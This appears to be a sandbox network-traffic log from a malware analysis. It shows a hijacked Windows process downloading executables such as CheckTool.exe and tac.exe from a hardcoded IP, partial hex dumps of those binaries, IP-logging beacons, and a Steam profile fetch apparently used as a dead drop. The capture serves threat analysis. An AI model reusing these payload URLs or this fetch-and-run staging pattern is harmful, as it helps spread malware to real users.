                                                                                                                                                                                                                              Sep 24, 2024 15:34:29.796176910 CEST209OUTGET /Files/Channel2.exe HTTP/1.1
                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36
                                                                                                                                                                                                                              Host: 103.130.147.211
                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                              Sep 24, 2024 15:34:29.962893963 CEST1236INHTTP/1.1 200 OK
                                                                                                                                                                                                                              Date: Tue, 24 Sep 2024 13:34:29 GMT
                                                                                                                                                                                                                              Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30
                                                                                                                                                                                                                              Last-Modified: Tue, 24 Sep 2024 13:19:42 GMT
                                                                                                                                                                                                                              ETag: "658e0b-622dd5bbaa387"
                                                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                                                              Content-Length: 6655499
                                                                                                                                                                                                                              Content-Type: application/x-msdownload
                                                                                                                                                                                                                              Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 12 00 cd 30 f1 66 00 2c 5f 00 fb 25 00 00 e0 00 06 01 0b 01 02 23 00 ec 47 00 00 7e 5a 00 00 e4 66 00 b0 14 00 00 00 10 00 00 00 00 48 00 00 00 40 00 00 10 00 00 00 02 00 00 04 00 00 00 01 00 00 00 04 00 00 00 00 00 00 00 00 b0 c6 00 00 06 00 00 65 e5 65 00 02 00 00 00 00 00 20 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 60 b3 00 42 00 00 00 00 70 b3 00 e4 09 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 a0 b3 00 a0 28 0e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 34 ab 48 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 [TRUNCATED]
                                                                                                                                                                                                                              Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PEL0f,_%#G~ZfH@ee `Bp(4Hq.texttGG`P`.dataHG@`.rdataX HH@`@/4HH@0@.bssTfpL`.edataB`JL@0@.idatapLL@0.CRT4VL@0.tlsXL@0.reloc(*ZL@0B/14Z@B/29Z@B/41XLN4\@B/55B\@B/67Tf]
                                                                                                                                                                                                                              Sep 24, 2024 15:34:29.962918043 CEST224INData Raw: 00 00 00 00 00 00 00 00 00 00 00 40 00 30 42 2f 38 30 00 00 00 00 00 61 09 00 00 00 f0 c4 00 00 0a 00 00 00 84 5d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 39 31 00 00 00 00 00 05 8b 01 00 00 00 c5 00 00 8c 01 00 00 8e 5d 00 00 00 00
                                                                                                                                                                                                                              Data Ascii: @0B/80a]@B/91]@B/102_@B
                                                                                                                                                                                                                              Sep 24, 2024 15:34:29.962933064 CEST1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                              Data Ascii:
                                                                                                                                                                                                                              Sep 24, 2024 15:34:29.963052988 CEST1236INData Raw: 15 3c 72 f3 00 89 02 89 44 24 08 a1 20 70 8c 00 89 44 24 04 a1 24 70 8c 00 89 04 24 e8 76 8e 02 00 8b 0d 14 70 8c 00 a3 18 70 8c 00 85 c9 0f 84 f2 00 00 00 8b 15 10 70 8c 00 85 d2 0f 84 a1 00 00 00 8d 65 f0 59 5b 5e 5f 5d 8d 61 fc c3 8d 74 26 00
                                                                                                                                                                                                                              Data Ascii: <rD$ pD$$p$vpppeY[^_]at&E&(G$)G(GD$$G(G$G&v$qO&GpeY[^
                                                                                                                                                                                                                              Sep 24, 2024 15:34:29.963068008 CEST1236INData Raw: 01 74 02 eb 1a 8b 45 0c 89 44 24 04 8b 45 08 89 04 24 e8 8b 42 3f 00 c7 45 f4 00 00 00 00 90 eb d6 90 c9 c3 55 89 e5 83 ec 10 c7 45 f0 b5 18 40 00 c7 45 f4 99 18 40 00 c7 45 f8 a7 18 40 00 c7 45 fc 01 00 00 00 8b 45 fc 8b 44 85 f0 90 ff e0 8b 45
                                                                                                                                                                                                                              Data Ascii: tED$E$B?EUE@E@E@EEDEp E| UE]UEuE1E]UE@]U8EAEEEEEwE
                                                                                                                                                                                                                              Sep 24, 2024 15:34:29.963191032 CEST672INData Raw: 44 24 04 8b 45 08 89 04 24 e8 44 08 42 00 e9 20 ff ff ff c9 c3 55 89 e5 8b 45 08 c7 40 04 02 00 00 00 90 5d c3 55 89 e5 8b 45 08 c7 40 10 02 00 00 00 90 5d c3 55 89 e5 8b 45 08 c7 80 a4 00 00 00 02 00 00 00 90 5d c3 55 89 e5 83 ec 28 c7 45 ec 89
                                                                                                                                                                                                                              Data Ascii: D$E$DB UE@]UE@]UE]U(E@E@EED2ED$ED$ED$E$w8EEDUE@E@EL$T$$p#=E@U8E1E{E
                                                                                                                                                                                                                              Sep 24, 2024 15:34:29.963206053 CEST1236INData Raw: 08 8b 45 0c 89 44 24 04 8b 45 08 89 04 24 e8 92 50 3d 00 e9 74 ff ff ff c9 c3 55 89 e5 81 ec c8 00 00 00 c7 45 f4 01 00 00 00 83 7d f4 00 0f 84 77 01 00 00 83 7d f4 01 74 05 e9 67 01 00 00 8b 85 a8 00 00 00 89 84 24 a0 00 00 00 8b 85 a4 00 00 00
                                                                                                                                                                                                                              Data Ascii: ED$E$P=tUE}w}tg$$$$$$$$$D$|D$xE|D$tExD$pEtD$lEpD$hElD$dEhD$`
                                                                                                                                                                                                                              Sep 24, 2024 15:34:29.963316917 CEST224INData Raw: 00 90 5d c3 55 89 e5 8b 45 08 8b 00 8b 00 8b 00 8b 90 68 af 06 00 8b 45 08 8b 00 8b 00 8b 00 81 ea 00 80 00 00 89 90 68 af 06 00 8b 45 08 c7 40 04 00 00 00 00 90 5d c3 55 89 e5 8b 45 08 8b 00 8b 00 c7 00 24 21 88 00 8b 45 08 c7 40 04 00 00 00 00
                                                                                                                                                                                                                              Data Ascii: ]UEhEhE@]UE$!E@]U8E}t9}u0ED$ED$ED$ED$E$;D?EU8EE|EEEEEEwEDU$
                                                                                                                                                                                                                              Sep 24, 2024 15:34:29.963330030 CEST892INData Raw: ff d0 eb e7 90 c9 c3 55 89 e5 57 56 53 81 ec ec 00 00 00 8b 45 08 8b 40 74 8b 00 89 c2 8b 45 08 8b 40 70 8b 08 89 4d e4 8b 45 08 8b 40 6c 8b 18 89 5d e0 8b 45 08 8b 40 68 8b 30 89 75 dc 8b 45 08 8b 40 64 8b 38 89 7d d8 8b 45 08 8b 40 60 8b 00 89
                                                                                                                                                                                                                              Data Ascii: UWVSE@tE@pME@l]E@h0uE@d8}E@`EE@\ME@X]E@T0uE@P8}E@LEE@HME@D]E@@0uE@<8}E@8EE@4ME@0]E@,0uE@(8}E@
                                                                                                                                                                                                                              Sep 24, 2024 15:34:29.964327097 CEST1236INData Raw: 40 38 8b 00 dd 00 8b 45 08 8b 40 14 8b 00 8b 00 89 c2 8b 45 08 8b 40 4c 8b 00 8b 08 89 4d e4 8b 45 08 8b 40 0c 8b 00 8b 18 89 5d e0 8b 45 08 8b 40 1c 8b 00 8b 30 89 75 dc 8b 45 08 8b 40 30 8b 00 8b 38 89 7d d8 8b 45 08 8b 40 2c 8b 00 dd 00 8b 45
                                                                                                                                                                                                                              Data Ascii: @8E@E@LME@]E@0uE@08}E@,E@<E@EE@LME@]E@8]E@4]E@ ]E@4]E@0uE@H8}E@0EE@ E@<E
                                                                                                                                                                                                                              Sep 24, 2024 15:34:29.964382887 CEST224INData Raw: a0 8b 45 08 8b 40 08 8b 00 8b 18 89 5d 9c 8b 45 08 8b 40 30 8b 00 dd 00 8b 45 08 8b 40 44 8b 00 8b 30 89 75 98 8b 45 08 8b 40 30 8b 00 dd 00 8b 45 08 8b 40 14 8b 00 dd 00 8b 45 08 8b 40 18 8b 00 dd 00 d9 ce 8b 45 08 8b 40 40 8b 00 8b 38 8b 45 08
                                                                                                                                                                                                                              Data Ascii: E@]E@0E@D0uE@0E@E@E@@8E@$0E@(E@LE@PE$E$E$E$E$E$E$ED$|ED$xED$tED$p\$h\$
                                                                                                                                                                                                                              Sep 24, 2024 15:34:34.716403961 CEST204OUTGET /Files/tac.exe HTTP/1.1
                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36
                                                                                                                                                                                                                              Host: 103.130.147.211
                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                              Sep 24, 2024 15:34:34.879370928 CEST1236INHTTP/1.1 200 OK
                                                                                                                                                                                                                              Date: Tue, 24 Sep 2024 13:34:34 GMT
                                                                                                                                                                                                                              Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30
                                                                                                                                                                                                                              Last-Modified: Sun, 22 Sep 2024 12:41:11 GMT
                                                                                                                                                                                                                              ETag: "1a27530-622b4964af59a"
                                                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                                                              Content-Length: 27424048
                                                                                                                                                                                                                              Content-Type: application/x-msdownload
                                                                                                                                                                                                                              Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 1e 11 0d a7 5a 70 63 f4 5a 70 63 f4 5a 70 63 f4 11 08 60 f5 5d 70 63 f4 11 08 66 f5 ee 70 63 f4 11 08 67 f5 50 70 63 f4 99 f3 9e f4 59 70 63 f4 99 f3 60 f5 53 70 63 f4 99 f3 67 f5 4b 70 63 f4 99 f3 66 f5 72 70 63 f4 11 08 62 f5 51 70 63 f4 5a 70 62 f4 c1 70 63 f4 4f f4 67 f5 43 70 63 f4 4f f4 61 f5 5b 70 63 f4 52 69 63 68 5a 70 63 f4 00 00 00 00 00 00 00 00 50 45 00 00 64 86 06 00 ff 71 ec 66 00 00 00 00 00 00 00 00 f0 00 22 00 0b 02 0e 28 00 a0 02 00 00 8e 05 00 00 00 00 00 b0 cd 00 00 00 10 00 00 00 00 00 40 01 00 00 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 b0 08 00 00 04 00 00 87 97 [TRUNCATED]
                                                                                                                                                                                                                              Data Ascii: MZ@!L!This program cannot be run in DOS mode.$ZpcZpcZpc`]pcfpcgPpcYpc`SpcgKpcfrpcbQpcZpbpcOgCpcOa[pcRichZpcPEdqf"(@`\xp'@P"d@@.text `.rdataP*,@@.dataS@.pdataP"@$@@.rsrc'p(@@.relocd*@B


                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                              5192.168.2.849735103.130.147.211807672C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                              Sep 24, 2024 15:34:29.016922951 CEST210OUTGET /Files/CheckTool.exe HTTP/1.1
                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36
                                                                                                                                                                                                                              Host: 103.130.147.211
                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                              Sep 24, 2024 15:34:29.824237108 CEST1236INHTTP/1.1 200 OK
                                                                                                                                                                                                                              Date: Tue, 24 Sep 2024 13:34:29 GMT
                                                                                                                                                                                                                              Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30
                                                                                                                                                                                                                              Last-Modified: Sun, 22 Sep 2024 12:40:07 GMT
                                                                                                                                                                                                                              ETag: "1fafc00-622b49283eea0"
                                                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                                                              Content-Length: 33225728
                                                                                                                                                                                                                              Content-Type: application/x-msdownload
                                                                                                                                                                                                                              Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 8b 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 00 00 00 00 00 d4 f7 01 00 00 00 00 e0 00 02 01 0b 01 03 00 00 88 c6 00 00 0e 1a 00 00 00 00 00 60 75 07 00 00 10 00 00 00 c0 d3 01 00 00 40 00 00 10 00 00 00 02 00 00 06 00 01 00 01 00 00 00 06 00 01 00 00 00 00 00 00 40 ff 01 00 04 00 00 cb c1 fb 01 02 00 40 81 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 b0 ee 01 4c 04 00 00 00 10 fc 01 36 24 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 ee 01 18 3b 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 [TRUNCATED]
                                                                                                                                                                                                                              Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PEL`u@@@L6$;.text `.rdata\@@.dataL@.idataL@.reloc;<@B.symtabB.rsrc6$&@@
                                                                                                                                                                                                                              Sep 24, 2024 15:34:29.824312925 CEST224INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 8b 04 24 c3 cc cc cc cc cc cc cc cc cc cc cc cc 8b
                                                                                                                                                                                                                              Data Ascii: $$$$,$4$<$ Go build ID: "pq5QRNjOsRk7j4oYV3qX/wEOWHkDsXy
                                                                                                                                                                                                                              Sep 24, 2024 15:34:29.824326992 CEST1236INData Raw: 79 47 65 37 4e 73 35 6d 53 69 2f 44 2d 41 62 79 7a 68 7a 6a 6d 72 4b 71 74 41 79 46 73 6b 63 2f 75 6a 6b 5f 58 5f 54 66 2d 56 6c 65 37 52 44 4f 79 65 50 79 22 0a 20 ff cc cc cc cc cc cc cc cc cc 8b 0d 80 e6 2c 02 64 8b 09 8b 09 3b 61 08 0f 86 9a
                                                                                                                                                                                                                              Data Ascii: yGe7Ns5mSi/D-AbyzhzjmrKqtAyFskc/ujk_X_Tf-Vle7RDOyePy" ,d;aO]C$D$D$OC$D$oj`T]C$D$@;C
                                                                                                                                                                                                                              Sep 24, 2024 15:34:29.824398994 CEST1236INData Raw: 24 04 0f b6 48 0f 83 e1 1f 80 f9 12 75 08 8b 40 24 89 44 24 08 c3 c7 44 24 08 00 00 00 00 c3 e8 c9 3f 07 00 eb c7 cc cc cc cc cc cc cc 8b 0d 80 e6 2c 02 64 8b 09 8b 09 3b 61 08 0f 86 92 00 00 00 8b 44 24 04 0f b6 48 0c f6 c1 01 74 7c 0f b6 48 0f
                                                                                                                                                                                                                              Data Ascii: $Hu@$D$D$?,d;aD$Ht|Hw4wtuI(D$,D$u$D$0D$wu8D$$D$tt D$0D$$D$D$?P,d;av[D$
                                                                                                                                                                                                                              Sep 24, 2024 15:34:29.824414015 CEST448INData Raw: 8b 09 8b 09 3b 61 08 76 14 8b 44 24 04 8b 40 34 a9 02 00 00 00 0f 95 c0 88 44 24 08 c3 e8 f7 3a 07 00 eb d5 cc cc cc cc cc 8b 0d 80 e6 2c 02 64 8b 09 8b 09 3b 61 08 76 14 8b 44 24 04 8b 40 34 a9 04 00 00 00 0f 95 c0 88 44 24 08 c3 e8 c7 3a 07 00
                                                                                                                                                                                                                              Data Ascii: ;avD$@4D$:,d;avD$@4D$:,d;avD$@4D$:,d;avD$@4D$g:,d;av"D$Hu@ D$D$):
                                                                                                                                                                                                                              Sep 24, 2024 15:34:29.824491024 CEST1236INData Raw: 22 25 ff 7f 00 00 89 44 24 08 c3 e8 49 39 07 00 eb d7 cc cc cc cc cc cc cc 8b 0d 80 e6 2c 02 64 8b 09 8b 09 3b 61 08 0f 86 8c 00 00 00 83 ec 08 8b 6c 24 0c 0f b7 75 22 81 e6 ff 7f 00 00 90 66 85 f6 75 06 31 db 31 d2 eb 43 0f b6 7d 0c 97 f6 c0 01
                                                                                                                                                                                                                              Data Ascii: "%D$I9,d;al$u"fu11C}t4$} w:9w,)!TD$9sD$2MMM8V,d;aviD$Ht4$
                                                                                                                                                                                                                              Sep 24, 2024 15:34:29.824505091 CEST224INData Raw: 7c 22 89 c1 f7 d8 39 d0 72 0c 89 4c 24 0c 89 54 24 10 83 c4 04 c3 85 c9 74 05 e8 b6 45 06 00 e8 f1 45 06 00 e8 ac 45 06 00 e8 47 72 03 00 90 e8 51 34 07 00 e9 4c ff ff ff cc cc cc cc cc cc cc cc cc cc cc cc 8b 0d 80 e6 2c 02 64 8b 09 8b 09 3b 61
                                                                                                                                                                                                                              Data Ascii: |"9rL$T$tEEEGrQ4L,d;aD$t11D$D$\$KIYtL$6 !u\$11l$M,4I4q|(
                                                                                                                                                                                                                              Sep 24, 2024 15:34:29.824615002 CEST1236INData Raw: 02 85 f6 7c 59 89 4c 24 04 0f b6 3f 97 88 44 24 03 97 83 e7 7f 89 f1 d3 e7 83 f9 20 19 f6 21 f7 01 fb 0f b6 74 24 03 96 f6 c0 80 96 75 be 90 8d 44 28 03 85 db 7c 22 89 c1 f7 d8 39 d8 72 0c 89 4c 24 14 89 5c 24 18 83 c4 0c c3 85 c9 74 05 e8 a1 44
                                                                                                                                                                                                                              Data Ascii: |YL$?D$ !t$uD(|"9rL$\$tDDD2q-q73,d;a\T$d 7\$l D$1D$3D$7D$'D$)D$-1D1A
                                                                                                                                                                                                                              Sep 24, 2024 15:34:29.824630022 CEST1236INData Raw: cc 8b 0d 80 e6 2c 02 64 8b 09 8b 09 3b 61 08 76 21 8b 59 10 85 db 75 21 8b 44 24 04 85 c0 74 0c 8b 4c 24 08 03 08 90 89 4c 24 0c c3 e8 30 9c 00 00 90 e8 9a 2e 07 00 eb c8 8d 7c 24 04 39 3b 75 d7 89 23 eb d3 cc cc cc cc cc cc cc cc cc cc cc cc 8b
                                                                                                                                                                                                                              Data Ascii: ,d;av!Yu!D$tL$L$0.|$9;u#,d;av!Yu!D$tL$L$J.|$9;u#,d;av%Yu%D$tD$-|$9;u#
                                                                                                                                                                                                                              Sep 24, 2024 15:34:29.824645042 CEST448INData Raw: 07 00 eb 99 8d 7c 24 04 39 3b 75 a8 89 23 eb a4 cc cc cc cc cc cc cc cc cc cc cc cc cc 8b 0d 80 e6 2c 02 64 8b 09 8b 09 3b 61 08 76 34 83 ec 10 8b 59 10 85 db 75 31 8b 44 24 14 84 00 89 04 24 e8 f8 ec ff ff 8b 44 24 04 8b 4c 24 08 8b 54 24 0c 89
                                                                                                                                                                                                                              Data Ascii: |$9;u#,d;av4Yu1D$$D$L$T$D$L$T$ )|$9;u#,d;avYuD$@D$W)|$9;u#,d;avYuD$Ht1D$)
                                                                                                                                                                                                                              Sep 24, 2024 15:34:29.829333067 CEST1236INData Raw: 95 c0 88 44 24 08 c3 e8 31 28 07 00 eb cf 8d 7c 24 04 39 3b 75 de 89 23 eb da cc cc cc 8b 0d 80 e6 2c 02 64 8b 09 8b 09 3b 61 08 76 1a 8b 59 10 85 db 75 1a 8b 44 24 04 0f b6 40 0f f6 c0 20 0f 94 c0 88 44 24 08 c3 e8 f1 27 07 00 eb cf 8d 7c 24 04
                                                                                                                                                                                                                              Data Ascii: D$1(|$9;u#,d;avYuD$@ D$'|$9;u#,d;avYuD$Ht1D$'|$9;u#,d;avYuD$@ D$a'|$9;u#,


                                                                                                                                                                                                                              TimestampSource IPSource PortDest IPDest PortSubjectIssuerNot BeforeNot AfterJA3 SSL Client FingerprintJA3 SSL Client Digest
                                                                                                                                                                                                                              Sep 24, 2024 15:34:21.263799906 CEST34.117.59.81443192.168.2.849715CN=ipinfo.io CN=R11, O=Let's Encrypt, C=USCN=R11, O=Let's Encrypt, C=US CN=ISRG Root X1, O=Internet Security Research Group, C=USSat Aug 17 17:05:34 CEST 2024 Wed Mar 13 01:00:00 CET 2024Fri Nov 15 16:05:33 CET 2024 Sat Mar 13 00:59:59 CET 2027771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-5-10-11-13-35-23-65281,29-23-24,0a0e9f5d64349fb13191bc781f81f42e1
                                                                                                                                                                                                                              CN=R11, O=Let's Encrypt, C=USCN=ISRG Root X1, O=Internet Security Research Group, C=USWed Mar 13 01:00:00 CET 2024Sat Mar 13 00:59:59 CET 2027
                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                              0192.168.2.849746188.114.96.34437672C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                              2024-09-24 13:34:57 UTC189OUTGET /1S3fd7 HTTP/1.1
                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36
                                                                                                                                                                                                                              Host: iplog.co
                                                                                                                                                                                                                              2024-09-24 13:34:57 UTC1103INHTTP/1.1 200 OK
                                                                                                                                                                                                                              Date: Tue, 24 Sep 2024 13:34:57 GMT
                                                                                                                                                                                                                              Content-Type: image/png
                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                              set-cookie: 27508147137263905=3; expires=Wed, 24 Sep 2025 13:34:57 GMT; Max-Age=31536000; path=/; secure; HttpOnly; SameSite=Strict
                                                                                                                                                                                                                              set-cookie: clhf03028ja=8.46.123.33; expires=Wed, 24 Sep 2025 13:34:57 GMT; Max-Age=31536000; path=/; secure; HttpOnly; SameSite=Strict
                                                                                                                                                                                                                              memory: 0.430877685546875
                                                                                                                                                                                                                              expires: Tue, 24 Sep 2024 13:34:57 +0000
                                                                                                                                                                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                              strict-transport-security: max-age=604800
                                                                                                                                                                                                                              strict-transport-security: max-age=31536000
                                                                                                                                                                                                                              content-security-policy: img-src https: data:; upgrade-insecure-requests
                                                                                                                                                                                                                              x-frame-options: SAMEORIGIN
                                                                                                                                                                                                                              CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=c%2BTLHE1J8XgJxQhdOjdcZvtMjt6kFW2ayhLsy%2BCLigKdZ30POcN3xfqaSLesSaaHo9SL5nPWMXwFj8tkjoTu8RvB6sdvBpCpkMLWJNxLlInNiFT1Yz85HGupMg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                                                                              CF-RAY: 8c8327a6ed0141c1-EWR
                                                                                                                                                                                                                              2024-09-24 13:34:57 UTC122INData Raw: 37 34 0d 0a 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 01 00 00 00 01 01 03 00 00 00 25 db 56 ca 00 00 00 03 50 4c 54 45 00 00 00 a7 7a 3d da 00 00 00 01 74 52 4e 53 00 40 e6 d8 66 00 00 00 09 70 48 59 73 00 00 0e c4 00 00 0e c4 01 95 2b 0e 1b 00 00 00 0a 49 44 41 54 08 99 63 60 00 00 00 02 00 01 f4 71 64 a6 00 00 00 00 49 45 4e 44 ae 42 60 82 0d 0a
                                                                                                                                                                                                                              Data Ascii: 74PNGIHDR%VPLTEz=tRNS@fpHYs+IDATc`qdIENDB`
                                                                                                                                                                                                                              2024-09-24 13:34:57 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                              Data Ascii: 0


                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                              1192.168.2.849757104.102.49.2544432384C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                              2024-09-24 13:35:13 UTC219OUTGET /profiles/76561199724331900 HTTP/1.1
                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                              Host: steamcommunity.com
                                                                                                                                                                                                                              2024-09-24 13:35:14 UTC1870INHTTP/1.1 200 OK
                                                                                                                                                                                                                              Server: nginx
                                                                                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                              Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.akamai.steamstatic.com/ https://cdn.akamai.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.akamai.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq. [TRUNCATED]
                                                                                                                                                                                                                              Expires: Mon, 26 Jul 1997 05:00:00 GMT
                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                              Date: Tue, 24 Sep 2024 13:35:14 GMT
                                                                                                                                                                                                                              Content-Length: 34668
                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                              Set-Cookie: sessionid=c53845f6570b28835fe81d12; Path=/; Secure; SameSite=None
                                                                                                                                                                                                                              Set-Cookie: steamCountry=US%7Cd7fb65801182a5f50a3169fe2a0b7ef0; Path=/; Secure; HttpOnly; SameSite=None
                                                                                                                                                                                                                              2024-09-24 13:35:14 UTC14514INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 20 72 65 73 70 6f 6e 73 69 76 65 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 0d 0a 09 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 74 68 65 6d 65 2d 63 6f 6c 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 23 31 37 31 61 32 31 22 3e 0d 0a 09 09 3c
                                                                                                                                                                                                                              Data Ascii: <!DOCTYPE html><html class=" responsive" lang="en"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta name="viewport" content="width=device-width,initial-scale=1"><meta name="theme-color" content="#171a21"><
